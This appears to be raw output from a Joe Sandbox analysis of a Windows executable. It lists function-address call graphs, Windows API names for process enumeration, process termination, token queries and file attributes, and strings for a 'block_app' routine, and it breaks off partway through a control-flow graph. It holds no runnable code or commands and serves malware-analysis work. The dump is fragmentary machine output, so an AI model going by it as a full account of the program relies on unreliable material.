8 API calls 9650->9652 9658 7ff66ebaa41b 9651->9658 9654 7ff66ebaa411 9652->9654 9653->9658 9655 7ff66ebaa4a1 strlen GetProcessHeap HeapAlloc 9654->9655 9654->9658 9656 7ff66ebaa4d3 9655->9656 9657 7ff66ebaa52d 9655->9657 9656->9658 9659 7ff66ebaa4db strlen 9656->9659 9660 7ff66eba14e2 6 API calls 9657->9660 9664 7ff66eba6e61 9659->9664 9660->9656 9663 7ff66ebaa511 GetProcessHeap HeapFree 9663->9658 9665 7ff66eba6e71 9664->9665 9666 7ff66eba6e93 9664->9666 9667 7ff66eba6ec6 9665->9667 9668 7ff66eba6e76 9665->9668 9669 7ff66eba14e2 6 API calls 9666->9669 9670 7ff66eba14e2 6 API calls 9667->9670 9671 7ff66eba6ef9 9668->9671 9672 7ff66eba6e7c 9668->9672 9675 7ff66eba6e85 9669->9675 9670->9675 9673 7ff66eba14e2 6 API calls 9671->9673 9674 7ff66eba14e2 6 API calls 9672->9674 9672->9675 9673->9675 9674->9675 9675->9658 9675->9663 11257 7ff66ebb06e1 FreeLibrary 10863 7ff66eba65e3 10864 7ff66eba6684 10863->10864 10865 7ff66eba65f9 10863->10865 10866 7ff66eba14e2 6 API calls 10864->10866 10867 7ff66eba6602 10865->10867 10868 7ff66eba66b4 10865->10868 10875 7ff66eba66ad 10866->10875 10870 7ff66eba660e strlen 10867->10870 10871 7ff66eba66e4 10867->10871 10869 7ff66eba14e2 6 API calls 10868->10869 10869->10875 10873 7ff66eba6620 10870->10873 10870->10875 10872 7ff66eba14e2 6 API calls 10871->10872 10872->10875 10874 7ff66eba6640 strlen 10873->10874 10876 7ff66eba662f strlen 10873->10876 10882 7ff66eba743a 10874->10882 10880 7ff66eba14e2 6 API calls 10875->10880 10876->10874 10878 7ff66eba6656 strlen 10879 7ff66eba14e2 6 API calls 10878->10879 10881 7ff66eba667a 10879->10881 10880->10881 10883 7ff66eba7456 10882->10883 10883->10878 10884 7ff66ebaadd8 10885 7ff66ebaae3e 10884->10885 10886 7ff66ebaadf3 10884->10886 10886->10885 10887 7ff66ebaae0d EnterCriticalSection LeaveCriticalSection 10886->10887 10887->10885 10888 7ff66eba89d9 10889 7ff66eba8a13 CloseHandle 10888->10889 10903 7ff66eba860e 10889->10903 10890 7ff66eba8669 Process32Next 10892 7ff66eba867d GetLastError 10890->10892 10890->10903 10891 7ff66eba8ca5 CloseHandle 10893 7ff66eba8cb5 10891->10893 10892->10903 10894 7ff66ebaa1f1 11 API calls 10894->10903 10895 7ff66eba88cd OpenProcess 10896 7ff66eba88ee QueryFullProcessImageNameW 10895->10896 10897 7ff66eba8a78 GetLastError 10895->10897 10898 7ff66eba892e GetLastError 10896->10898 10896->10903 10899 7ff66eba14e2 6 API calls 10897->10899 10900 7ff66eba14e2 6 API calls 10898->10900 10899->10903 10900->10903 10901 7ff66eba8153 29 API calls 10901->10903 10902 7ff66eba14e2 6 API calls 10902->10903 10903->10889 10903->10890 10903->10891 10903->10894 10903->10895 10903->10901 10903->10902 11258 7ff66ebb02d7 11259 7ff66ebb02f6 11258->11259 11260 7ff66ebb02fd ___lc_codepage_func ___mb_cur_max_func 11258->11260 11259->11260 11261 7ff66ebb0318 11260->11261 11262 7ff66ebb0358 11260->11262 11261->11262 11263 7ff66ebb0323 11261->11263 11266 7ff66ebb0361 11261->11266 11263->11262 11264 7ff66ebb0150 4 API calls 11263->11264 11264->11263 11265 7ff66ebb0150 4 API calls 11265->11266 11266->11262 11266->11265 9676 7ff66ebac3dc 9681 7ff66ebab3e7 9676->9681 9678 7ff66ebaca67 9679 7ff66ebac382 9679->9676 9679->9678 9680 7ff66ebab3e7 fputc 9679->9680 9680->9679 9682 7ff66ebab3f8 9681->9682 9683 7ff66ebab410 9682->9683 9684 7ff66ebab409 fputc 9682->9684 9683->9679 9684->9683 10142 7ff66ebadcdd strerror 10149 7ff66ebacfc8 10142->10149 10150 7ff66ebacfd8 10149->10150 10151 7ff66ebacff6 strlen 10150->10151 10152 7ff66ebacfef 10150->10152 10151->10152 9694 7ff66ebac3f0 9695 7ff66ebac423 9694->9695 9696 7ff66ebac417 9694->9696 9702 7ff66ebab4fe 9695->9702 9710 7ff66ebab420 9696->9710 9699 7ff66ebaca67 9700 7ff66ebac382 9700->9699 9701 7ff66ebab3e7 fputc 9700->9701 9701->9700 9703 7ff66ebab516 9702->9703 9704 7ff66ebab3e7 fputc 9703->9704 9706 7ff66ebab523 9703->9706 9704->9703 9705 7ff66ebab56e 9707 7ff66ebab58a 9705->9707 9709 7ff66ebab3e7 fputc 9705->9709 9706->9705 9708 7ff66ebab3e7 fputc 9706->9708 9707->9700 9708->9706 9709->9705 9720 7ff66ebb0047 9710->9720 9712 7ff66ebab44f 9713 7ff66ebab3e7 fputc 9712->9713 9718 7ff66ebab462 9712->9718 9713->9712 9714 7ff66ebab4d1 9715 7ff66ebab4ed 9714->9715 9717 7ff66ebab3e7 fputc 9714->9717 9715->9700 9716 7ff66ebb0047 4 API calls 9716->9718 9717->9714 9718->9714 9718->9716 9719 7ff66ebab3e7 fputc 9718->9719 9719->9718 9721 7ff66ebb0053 9720->9721 9722 7ff66ebb0058 ___mb_cur_max_func ___lc_codepage_func 9720->9722 9721->9722 9725 7ff66ebaffd0 9722->9725 9726 7ff66ebafff4 WideCharToMultiByte 9725->9726 9727 7ff66ebaffe4 9725->9727 9726->9727 9728 7ff66ebb0034 _errno 9726->9728 9727->9728 9729 7ff66ebaffeb 9727->9729 9728->9729 9729->9712 10904 7ff66ebb05e9 RemoveDirectoryA 9730 7ff66ebac7ec 9733 7ff66ebac382 9730->9733 9731 7ff66ebaca67 9732 7ff66ebab3e7 fputc 9732->9733 9733->9731 9733->9732 10930 7ff66eba9181 10933 7ff66eba8e2e 10930->10933 10931 7ff66eba90f2 GetProcessHeap HeapFree 10931->10933 10932 7ff66eba8da0 10934 7ff66eba9284 10932->10934 10935 7ff66eba8da9 FreeLibrary 10932->10935 10933->10931 10933->10932 10936 7ff66ebaa1f1 11 API calls 10933->10936 10937 7ff66eba8ecc strlen 10933->10937 10938 7ff66eba8f64 GetProcessHeap HeapAlloc 10933->10938 10939 7ff66eba14e2 6 API calls 10933->10939 10940 7ff66eba8fb2 BuildTrusteeWithSidW BuildSecurityDescriptorW 10933->10940 10941 7ff66eba795a 14 API calls 10933->10941 10942 7ff66eba91dc LocalFree 10933->10942 10935->10934 10936->10933 10937->10933 10938->10933 10939->10933 10940->10933 10941->10933 10942->10933 9743 7ff66eba6776 9744 7ff66eba67fb 9743->9744 9745 7ff66eba678c 9743->9745 9748 7ff66eba14e2 6 API calls 9744->9748 9746 7ff66eba682e 9745->9746 9747 7ff66eba6795 9745->9747 9751 7ff66eba14e2 6 API calls 9746->9751 9749 7ff66eba685e 9747->9749 9750 7ff66eba679e 9747->9750 9766 7ff66eba6824 9748->9766 9752 7ff66eba14e2 6 API calls 9749->9752 9753 7ff66eba688e 9750->9753 9754 7ff66eba67aa ExpandEnvironmentStringsA 9750->9754 9751->9766 9752->9766 9755 7ff66eba14e2 6 API calls 9753->9755 9756 7ff66eba6909 GetLastError 9754->9756 9757 7ff66eba67bb 9754->9757 9755->9766 9759 7ff66eba14e2 6 API calls 9756->9759 9760 7ff66eba67c9 9757->9760 9761 7ff66eba69dc 9757->9761 9758 7ff66eba6a51 9759->9766 9764 7ff66eba14e2 6 API calls 9760->9764 9763 7ff66eba14e2 6 API calls 9761->9763 9762 7ff66eba14e2 6 API calls 9765 7ff66eba67f1 9762->9765 9763->9766 9764->9765 9766->9758 9766->9762 9767 7ff66ebb0779 CreateProcessAsUserA 10209 7ff66ebb0088 ___lc_codepage_func ___mb_cur_max_func 10210 7ff66ebb00f1 10209->10210 10211 7ff66ebb00b7 10209->10211 10212 7ff66ebb00c3 10211->10212 10215 7ff66ebb00bc 10211->10215 10212->10210 10214 7ff66ebaffd0 2 API calls 10212->10214 10213 7ff66ebaffd0 2 API calls 10213->10215 10214->10212 10215->10210 10215->10213 11312 7ff66ebade8a 11314 7ff66ebadea6 11312->11314 11313 7ff66ebacc00 10 API calls 11321 7ff66ebadb86 11313->11321 11315 7ff66ebadf21 11314->11315 11316 7ff66ebadf1c 11314->11316 11323 7ff66ebad5bc 11315->11323 11316->11313 11318 7ff66ebae2e0 11319 7ff66ebae301 11318->11319 11320 7ff66ebaccd9 2 API calls 11318->11320 11320->11319 11321->11318 11322 7ff66ebaccd9 fputwc fwprintf 11321->11322 11322->11321 11324 7ff66ebad5d3 11323->11324 11328 7ff66ebad76b 11324->11328 11331 7ff66ebaca90 fputwc 11324->11331 11325 7ff66ebad7aa 11327 7ff66ebaca90 fputwc 11325->11327 11326 7ff66ebaca90 fputwc 11326->11325 11329 7ff66ebad7b7 11327->11329 11328->11325 11328->11326 11330 7ff66ebaca90 fputwc 11329->11330 11332 7ff66ebad7c8 11330->11332 11331->11324 11334 7ff66ebaca90 fputwc 11332->11334 11337 7ff66ebad7ce 11332->11337 11333 7ff66ebad815 11335 7ff66ebad861 11333->11335 11339 7ff66ebaca90 fputwc 11333->11339 11334->11332 11340 7ff66ebaca90 fputwc 11335->11340 11336 7ff66ebacc72 7 API calls 11336->11337 11337->11333 11337->11336 11338 7ff66ebaca90 fputwc 11337->11338 11341 7ff66ebaccd9 2 API calls 11337->11341 11338->11337 11339->11333 11342 7ff66ebad875 11340->11342 11341->11337 11017 7ff66ebaa5a1 inet_addr 10225 7ff66ebac49e 10226 7ff66ebac4a7 10225->10226 10231 7ff66ebab593 10226->10231 10232 7ff66ebab5a3 10231->10232 10233 7ff66ebab5c1 strlen 10232->10233 10234 7ff66ebab5ba 10232->10234 10233->10234 11018 7ff66ebac59e 11019 7ff66ebac5b4 11018->11019 11024 7ff66ebac130 11019->11024 11021 7ff66ebaca67 11022 7ff66ebac382 11022->11021 11023 7ff66ebab3e7 fputc 11022->11023 11023->11022 11025 7ff66ebac141 11024->11025 11026 7ff66ebab2d0 6 API calls 11025->11026 11027 7ff66ebac171 11026->11027 11028 7ff66ebac193 11027->11028 11029 7ff66ebac186 11027->11029 11031 7ff66ebac08a 11 API calls 11028->11031 11030 7ff66ebab5da fputc 11029->11030 11032 7ff66ebac191 11030->11032 11031->11032 11032->11022 11033 7ff66ebafd98 11034 7ff66ebaf663 6 API calls 11033->11034 11035 7ff66ebafdb4 11034->11035 10243 7ff66eba7096 10244 7ff66eba70b2 strlen 10243->10244 10245 7ff66eba70c7 10243->10245 10244->10245 11343 7ff66ebb0699 GetModuleHandleW 10250 7ff66ebaac96 10251 7ff66ebaad13 signal 10250->10251 10253 7ff66ebaaca1 10250->10253 10252 7ff66ebaad25 signal 10251->10252 10251->10253 10252->10253 10254 7ff66eba749c 10255 7ff66eba74fd 10254->10255 10256 7ff66eba74bd 10254->10256 10259 7ff66eba14e2 6 API calls 10255->10259 10257 7ff66eba74c2 10256->10257 10258 7ff66eba7536 10256->10258 10261 7ff66eba756f 10257->10261 10262 7ff66eba74d6 strlen strlen 10257->10262 10260 7ff66eba14e2 6 API calls 10258->10260 10264 7ff66eba7526 10259->10264 10260->10264 10263 7ff66eba14e2 6 API calls 10261->10263 10262->10264 10263->10264 11059 7ff66ebae1b5 11060 7ff66ebae1bd localeconv 11059->11060 11062 7ff66ebadb86 11059->11062 11061 7ff66ebb026c 6 API calls 11060->11061 11061->11062 11063 7ff66ebae2e0 11062->11063 11066 7ff66ebaccd9 fputwc fwprintf 11062->11066 11064 7ff66ebae301 11063->11064 11065 7ff66ebaccd9 2 API calls 11063->11065 11065->11064 11066->11062 11344 7ff66ebb06a9 GetModuleFileNameA 11345 7ff66ebbb5d0 11344->11345 9824 7ff66ebb03ab ___mb_cur_max_func ___lc_codepage_func 9825 7ff66ebb03da 9824->9825 9826 7ff66ebb0150 4 API calls 9825->9826 9827 7ff66ebb03f9 9826->9827 10275 7ff66ebae045 10279 7ff66ebadb86 10275->10279 10276 7ff66ebae2e0 10277 7ff66ebae301 10276->10277 10278 7ff66ebaccd9 2 API calls 10276->10278 10278->10277 10279->10276 10280 7ff66ebaccd9 fputwc fwprintf 10279->10280 10280->10279 10281 7ff66eba5c44 10282 7ff66eba5cdf 10281->10282 10283 7ff66eba5c60 10281->10283 10285 7ff66eba14e2 6 API calls 10282->10285 10284 7ff66eba5c79 CreateFileA 10283->10284 10286 7ff66eba5d24 10283->10286 10287 7ff66eba5cb2 GetFileTime 10284->10287 10288 7ff66eba5ccc GetLastError 10284->10288 10289 7ff66eba5d1a 10285->10289 10291 7ff66eba14e2 6 API calls 10286->10291 10287->10288 10293 7ff66eba5d57 10287->10293 10290 7ff66eba5cd9 10288->10290 10288->10293 10290->10282 10290->10293 10291->10289 10292 7ff66eba5deb CloseHandle 10292->10289 10293->10289 10293->10292 9828 7ff66ebb0739 CreateFileA 10294 7ff66ebac436 10295 7ff66ebac48e 10294->10295 10296 7ff66ebac44b 10294->10296 10297 7ff66ebab593 strlen 10295->10297 10298 7ff66ebac475 wcslen 10296->10298 10299 7ff66ebac46e 10296->10299 10303 7ff66ebac382 10297->10303 10298->10299 10300 7ff66ebab420 5 API calls 10299->10300 10300->10303 10301 7ff66ebaca67 10302 7ff66ebab3e7 fputc 10302->10303 10303->10301 10303->10302 11366 7ff66ebaa650 11367 7ff66ebaa659 11366->11367 11368 7ff66ebaa662 11367->11368 11370 7ff66ebaaebd 11367->11370 11371 7ff66ebaaecb 11370->11371 11373 7ff66ebaaed3 11370->11373 11372 7ff66ebaaee1 11371->11372 11371->11373 11375 7ff66ebaaed1 11371->11375 11372->11373 11374 7ff66ebaaeeb InitializeCriticalSection 11372->11374 11373->11368 11374->11373 11375->11373 11376 7ff66ebaaf29 free 11375->11376 11377 7ff66ebaaf37 DeleteCriticalSection 11375->11377 11376->11375 11377->11373 11087 7ff66eba354e 11088 7ff66eba34db 11087->11088 11089 7ff66eba37ac 11088->11089 11090 7ff66eba14e2 6 API calls 11088->11090 11091 7ff66eba3505 11090->11091 11378 7ff66ebaae48 11379 7ff66ebaaeb4 11378->11379 11380 7ff66ebaae5a EnterCriticalSection 11378->11380 11381 7ff66ebaae73 11380->11381 11382 7ff66ebaaeab LeaveCriticalSection 11381->11382 11383 7ff66ebaae98 free 11381->11383 11382->11379 11383->11382 11097 7ff66eba6d60 11098 7ff66eba6d6f 11097->11098 11099 7ff66eba6d82 11097->11099 11101 7ff66eba6db5 11098->11101 11102 7ff66eba6d74 11098->11102 11100 7ff66eba14e2 6 API calls 11099->11100 11103 7ff66eba6d79 11100->11103 11104 7ff66eba14e2 6 API calls 11101->11104 11102->11103 11105 7ff66eba14e2 6 API calls 11102->11105 11104->11103 11105->11103 11106 7ff66eba1d60 11107 7ff66eba1e23 11106->11107 11108 7ff66eba1d77 11106->11108 11111 7ff66eba14e2 6 API calls 11107->11111 11109 7ff66eba1d80 OpenProcessToken 11108->11109 11110 7ff66eba1e53 11108->11110 11112 7ff66eba1eb8 GetLastError 11109->11112 11113 7ff66eba1d98 GetTokenInformation 11109->11113 11114 7ff66eba14e2 6 API calls 11110->11114 11132 7ff66eba1e21 11111->11132 11117 7ff66eba14e2 6 API calls 11112->11117 11115 7ff66eba1dce GetLastError 11113->11115 11116 7ff66eba1fcd 11113->11116 11114->11132 11119 7ff66eba1de0 11115->11119 11120 7ff66eba1f67 LocalAlloc 11115->11120 11118 7ff66eba2090 LocalAlloc 11116->11118 11121 7ff66eba20cb 11116->11121 11117->11132 11118->11121 11122 7ff66eba20a8 GetLengthSid memcpy 11118->11122 11123 7ff66eba14e2 6 API calls 11119->11123 11120->11121 11124 7ff66eba1f82 GetTokenInformation 11120->11124 11122->11121 11126 7ff66eba1df6 11123->11126 11124->11118 11127 7ff66eba1fac GetLastError 11124->11127 11125 7ff66eba14e2 6 API calls 11128 7ff66eba1ead 11125->11128 11129 7ff66eba1e0e CloseHandle 11126->11129 11130 7ff66eba1e05 LocalFree 11126->11130 11131 7ff66eba14e2 6 API calls 11127->11131 11129->11128 11129->11132 11130->11129 11131->11116 11132->11125 10308 7ff66eba2463 10309 7ff66eba2484 CloseHandle 10308->10309 10328 7ff66eba23f0 10309->10328 10310 7ff66eba26ed Process32Next 10311 7ff66eba2704 GetLastError 10310->10311 10310->10328 10311->10328 10313 7ff66eba2888 CloseHandle 10314 7ff66eba28a3 10313->10314 10315 7ff66eba21e4 10313->10315 10320 7ff66eba14e2 6 API calls 10314->10320 10315->10314 10317 7ff66eba21f4 10315->10317 10316 7ff66eba14e2 6 API calls 10316->10328 10321 7ff66eba14e2 6 API calls 10317->10321 10318 7ff66eba24d3 OpenProcess 10322 7ff66eba25a3 GetLastError 10318->10322 10323 7ff66eba24f4 TerminateProcess 10318->10323 10319 7ff66eba24c2 strcmp 10319->10318 10319->10328 10325 7ff66eba2211 10320->10325 10321->10325 10326 7ff66eba14e2 6 API calls 10322->10326 10323->10309 10324 7ff66eba250a GetLastError 10323->10324 10327 7ff66eba14e2 6 API calls 10324->10327 10326->10328 10327->10328 10328->10309 10328->10310 10328->10313 10328->10316 10328->10318 10328->10319 10329 7ff66eba3c63 10330 7ff66eba3cec 10329->10330 10331 7ff66eba3d7d 10330->10331 10334 7ff66eba3d02 10330->10334 10332 7ff66eba14e2 6 API calls 10331->10332 10333 7ff66eba3d30 10332->10333 10335 7ff66eba14e2 6 API calls 10334->10335 10335->10333 11133 7ff66ebac562 11134 7ff66ebac566 11133->11134 11135 7ff66ebab9b0 fputc 11134->11135 11136 7ff66ebac382 11134->11136 11135->11136 11137 7ff66ebaca67 11136->11137 11138 7ff66ebab3e7 fputc 11136->11138 11138->11136 9833 7ff66eba3b64 9834 7ff66eba3bc1 9833->9834 9835 7ff66eba3b8a 9833->9835 9838 7ff66eba14e2 6 API calls 9834->9838 9836 7ff66eba3b8f 9835->9836 9837 7ff66eba3bec 9835->9837 9852 7ff66eba3909 9836->9852 9840 7ff66eba14e2 6 API calls 9837->9840 9843 7ff66eba3bb9 9838->9843 9840->9843 9842 7ff66eba3ba2 SetFileAttributesA 9842->9843 9844 7ff66eba3c3e GetLastError 9842->9844 9843->9844 9846 7ff66eba3c6a 9843->9846 9845 7ff66eba14e2 6 API calls 9844->9845 9845->9843 9847 7ff66eba3d7d 9846->9847 9849 7ff66eba3d02 9846->9849 9848 7ff66eba14e2 6 API calls 9847->9848 9850 7ff66eba3d30 9848->9850 9851 7ff66eba14e2 6 API calls 9849->9851 9851->9850 9853 7ff66eba3921 9852->9853 9854 7ff66eba3998 9852->9854 9855 7ff66eba39d1 9853->9855 9856 7ff66eba392a GetFileAttributesA 9853->9856 9857 7ff66eba14e2 6 API calls 9854->9857 9859 7ff66eba14e2 6 API calls 9855->9859 9858 7ff66eba3a0a GetLastError 9856->9858 9862 7ff66eba393b 9856->9862 9857->9862 9860 7ff66eba14e2 6 API calls 9858->9860 9859->9862 9860->9862 9861 7ff66eba3b3a 9863 7ff66eba14e2 6 API calls 9861->9863 9862->9861 9864 7ff66eba3974 9862->9864 9865 7ff66eba3b5f 9863->9865 9866 7ff66eba14e2 6 API calls 9864->9866 9865->9865 9867 7ff66eba398a 9866->9867 9867->9842 9867->9843 11139 7ff66ebac958 11140 7ff66ebac960 localeconv 11139->11140 11143 7ff66ebac382 11139->11143 11141 7ff66ebb026c 6 API calls 11140->11141 11141->11143 11142 7ff66ebaca67 11143->11142 11144 7ff66ebab3e7 fputc 11143->11144 11144->11143 11384 7ff66ebade59 11385 7ff66ebade6f 11384->11385 11392 7ff66ebad9bb 11385->11392 11387 7ff66ebae2e0 11388 7ff66ebae301 11387->11388 11389 7ff66ebaccd9 2 API calls 11387->11389 11389->11388 11390 7ff66ebadb86 11390->11387 11391 7ff66ebaccd9 fputwc fwprintf 11390->11391 11391->11390 11393 7ff66ebad9cd 11392->11393 11394 7ff66ebad00f 6 API calls 11393->11394 11395 7ff66ebada05 11394->11395 11396 7ff66ebada2c 11395->11396 11397 7ff66ebada1a 11395->11397 11399 7ff66ebada9d 11396->11399 11403 7ff66ebada42 11396->11403 11398 7ff66ebacc00 10 API calls 11397->11398 11402 7ff66ebada27 11398->11402 11400 7ff66ebadaa1 11399->11400 11401 7ff66ebadaa8 strlen 11399->11401 11406 7ff66ebad897 9 API calls 11400->11406 11401->11400 11402->11390 11404 7ff66ebada4e strlen 11403->11404 11405 7ff66ebada46 11403->11405 11404->11405 11407 7ff66ebacdd0 9 API calls 11405->11407 11406->11402 11408 7ff66ebada81 11407->11408 11408->11402 11409 7ff66ebaca90 fputwc 11408->11409 11409->11408 11145 7ff66ebadd5c 11146 7ff66ebadd6e 11145->11146 11147 7ff66ebad3c1 fputwc 11146->11147 11151 7ff66ebadb86 11147->11151 11148 7ff66ebae2e0 11149 7ff66ebae301 11148->11149 11150 7ff66ebaccd9 2 API calls 11148->11150 11150->11149 11151->11148 11152 7ff66ebaccd9 fputwc fwprintf 11151->11152 11152->11151 9868 7ff66eba475d 9869 7ff66eba4b28 9868->9869 9870 7ff66eba4b35 9869->9870 9871 7ff66eba4b2d fclose 9869->9871 9872 7ff66eba4ba2 9870->9872 9873 7ff66eba4b39 9870->9873 9871->9870 9874 7ff66eba14e2 6 API calls 9872->9874 9876 7ff66eba14e2 6 API calls 9873->9876 9875 7ff66eba4b78 9874->9875 9876->9875 10340 7ff66eba385c 10341 7ff66eba3869 10340->10341 10348 7ff66eba38a9 10340->10348 10343 7ff66eba1cf4 8 API calls 10341->10343 10342 7ff66eba14e2 6 API calls 10347 7ff66eba38ce 10342->10347 10344 7ff66eba3875 10343->10344 10345 7ff66eba1c73 8 API calls 10344->10345 10344->10347 10346 7ff66eba3889 10345->10346 10346->10347 10346->10348 10349 7ff66eba38d8 GetLastError 10346->10349 10348->10342 10350 7ff66eba14e2 6 API calls 10349->10350 10350->10347 11174 7ff66eba2d71 11175 7ff66eba2f1c 11174->11175 11176 7ff66eba2f27 CloseHandle 11175->11176 11177 7ff66eba2f2d 11175->11177 11176->11177 11178 7ff66eba2f36 11177->11178 11179 7ff66eba29db 11177->11179 11180 7ff66eba14e2 6 API calls 11178->11180 11181 7ff66eba2a3c 11178->11181 11179->11181 11182 7ff66eba14e2 6 API calls 11179->11182 11180->11181 11182->11181 10381 7ff66ebadc75 10382 7ff66ebadccd 10381->10382 10383 7ff66ebadc8a 10381->10383 10384 7ff66ebacfc8 strlen 10382->10384 10385 7ff66ebadcb4 wcslen 10383->10385 10386 7ff66ebadcad 10383->10386 10391 7ff66ebadb86 10384->10391 10385->10386 10387 7ff66ebaccd9 2 API calls 10386->10387 10387->10391 10388 7ff66ebae2e0 10389 7ff66ebae301 10388->10389 10390 7ff66ebaccd9 2 API calls 10388->10390 10390->10389 10391->10388 10392 7ff66ebaccd9 fputwc fwprintf 10391->10392 10392->10391 10393 7ff66ebaa072 10394 7ff66ebaa0b6 10393->10394 10395 7ff66ebaa08c 10393->10395 10396 7ff66eba14e2 6 API calls 10394->10396 10399 7ff66eba9f70 10395->10399 10398 7ff66ebaa0a3 10396->10398 10400 7ff66eba9fd7 10399->10400 10401 7ff66eba9f9b 10399->10401 10403 7ff66eba14e2 6 API calls 10400->10403 10402 7ff66eba9ed0 8 API calls 10401->10402 10404 7ff66eba9fae 10402->10404 10406 7ff66eba9fb4 10403->10406 10405 7ff66ebaa007 _errno 10404->10405 10404->10406 10407 7ff66ebb0560 10405->10407 10406->10398 10408 7ff66ebaa029 _errno 10407->10408 10408->10406 10409 7ff66ebaa034 _errno 10408->10409 10410 7ff66eba14e2 6 API calls 10409->10410 10410->10406 9895 7ff66ebaa369 9896 7ff66ebaa378 9895->9896 9897 7ff66ebaa3a7 9895->9897 9901 7ff66ebaa264 9896->9901 9899 7ff66eba14e2 6 API calls 9897->9899 9900 7ff66ebaa390 9899->9900 9902 7ff66ebaa2c9 9901->9902 9903 7ff66ebaa286 9901->9903 9904 7ff66eba14e2 6 API calls 9902->9904 9905 7ff66eba9ed0 8 API calls 9903->9905 9908 7ff66ebaa29f 9904->9908 9906 7ff66ebaa299 9905->9906 9907 7ff66ebaa2f9 _errno _strtoui64 _errno 9906->9907 9906->9908 9907->9908 9909 7ff66ebaa32c _errno 9907->9909 9908->9900 9910 7ff66eba14e2 6 API calls 9909->9910 9910->9908 10418 7ff66eba4c69 10419 7ff66eba4be8 10418->10419 10420 7ff66eba4d5a 10419->10420 10421 7ff66eba4c0a 10419->10421 10422 7ff66eba14e2 6 API calls 10420->10422 10423 7ff66eba14e2 6 API calls 10421->10423 10424 7ff66eba4d7c 10422->10424 10425 7ff66eba4c20 10423->10425 10424->10424 11410 7ff66ebaa66c 11411 7ff66ebaa67e 11410->11411 11412 7ff66ebaaebd 3 API calls 11411->11412 11413 7ff66ebaa693 11411->11413 11412->11413
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$Process$CloseFullHandleImageNameNextOpenProcess32Querystrcmp
                                                      • String ID: [E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> OpenProcess failed(szExeFile=%s,gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> QueryFullProcessImageNameW failed(gle=%lu)$[I] (%s) -> Done(szExeFile=%s,th32ProcessID=%d)$app$block_app
                                                      • API String ID: 1025937399-1899507746
                                                      • Opcode ID: 1e170d9b8120a81f70631a2a1f41cb1946ebee46b206d7debbcd2553183d70b0
                                                      • Instruction ID: 36ccc4f542328b7857f90b4936bd55d84837bcca87f1d21d85f833c2dd30da49
                                                      • Opcode Fuzzy Hash: 1e170d9b8120a81f70631a2a1f41cb1946ebee46b206d7debbcd2553183d70b0
                                                      • Instruction Fuzzy Hash: F1F12721E8D683D3FE71565CA6D83B81271EB6E354F104032E60ECFAD5DE6DA884874E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 498 7ff66eba97f2-7ff66eba9814 499 7ff66eba98a5-7ff66eba98d3 call 7ff66eba14e2 498->499 500 7ff66eba981a-7ff66eba982d call 7ff66eba45d5 498->500 505 7ff66eba9833-7ff66eba983b 499->505 500->505 506 7ff66eba98d8-7ff66eba98e0 500->506 509 7ff66eba9854-7ff66eba9856 505->509 510 7ff66eba983d-7ff66eba984e GetProcessHeap HeapFree 505->510 507 7ff66eba9b7e-7ff66eba9b83 506->507 508 7ff66eba98e6-7ff66eba9900 506->508 507->505 511 7ff66eba9933-7ff66eba993a 508->511 512 7ff66eba9b9e-7ff66eba9baf call 7ff66eba14e2 509->512 513 7ff66eba985c-7ff66eba985f 509->513 510->509 517 7ff66eba993c-7ff66eba993f 511->517 518 7ff66eba995d-7ff66eba9998 GetProcessHeap HeapAlloc 511->518 522 7ff66eba9bb4 call 7ff66eba14e2 512->522 515 7ff66eba9861 513->515 516 7ff66eba9869-7ff66eba9876 513->516 515->516 523 7ff66eba9b92 516->523 524 7ff66eba987c-7ff66eba98a4 call 7ff66eba14e2 516->524 517->518 519 7ff66eba9941-7ff66eba9947 517->519 520 7ff66eba99d0-7ff66eba99e6 call 7ff66eba14e2 518->520 521 7ff66eba999a-7ff66eba99a1 518->521 526 7ff66eba9918-7ff66eba991b 519->526 527 7ff66eba9949 519->527 520->521 528 7ff66eba9b88-7ff66eba9b8d 521->528 529 7ff66eba99a7-7ff66eba99ce 521->529 523->512 536 7ff66eba992f 526->536 537 7ff66eba991d-7ff66eba9927 526->537 532 7ff66eba9902-7ff66eba9905 527->532 533 7ff66eba994b-7ff66eba994e 527->533 528->505 534 7ff66eba9a2a-7ff66eba9a37 529->534 532->536 541 7ff66eba9907-7ff66eba990a 532->541 538 7ff66eba9950-7ff66eba9953 533->538 539 7ff66eba9929 533->539 534->505 540 7ff66eba9a3d-7ff66eba9a40 534->540 536->511 537->536 538->536 542 7ff66eba9955-7ff66eba995b 538->542 539->536 540->505 543 7ff66eba9a46-7ff66eba9a4b 540->543 541->536 544 7ff66eba990c-7ff66eba9916 541->544 542->536 545 7ff66eba9a51-7ff66eba9a53 543->545 546 7ff66eba9b6e-7ff66eba9b74 543->546 544->536 547 7ff66eba9a55-7ff66eba9a57 545->547 548 7ff66eba99e8-7ff66eba99eb 545->548 546->507 549 7ff66eba9a59-7ff66eba9a5c 547->549 550 7ff66eba9a26 547->550 548->550 551 7ff66eba99ed-7ff66eba99f1 548->551 552 7ff66eba9a5e-7ff66eba9a61 549->552 553 7ff66eba9a1c-7ff66eba9a20 549->553 550->534 551->550 554 7ff66eba99f3-7ff66eba9a11 call 7ff66eba9770 552->554 555 7ff66eba9a63-7ff66eba9aa2 call 7ff66eba9770 * 2 552->555 553->550 554->553 560 7ff66eba9a13-7ff66eba9a16 554->560 555->553 565 7ff66eba9aa8-7ff66eba9aad 555->565 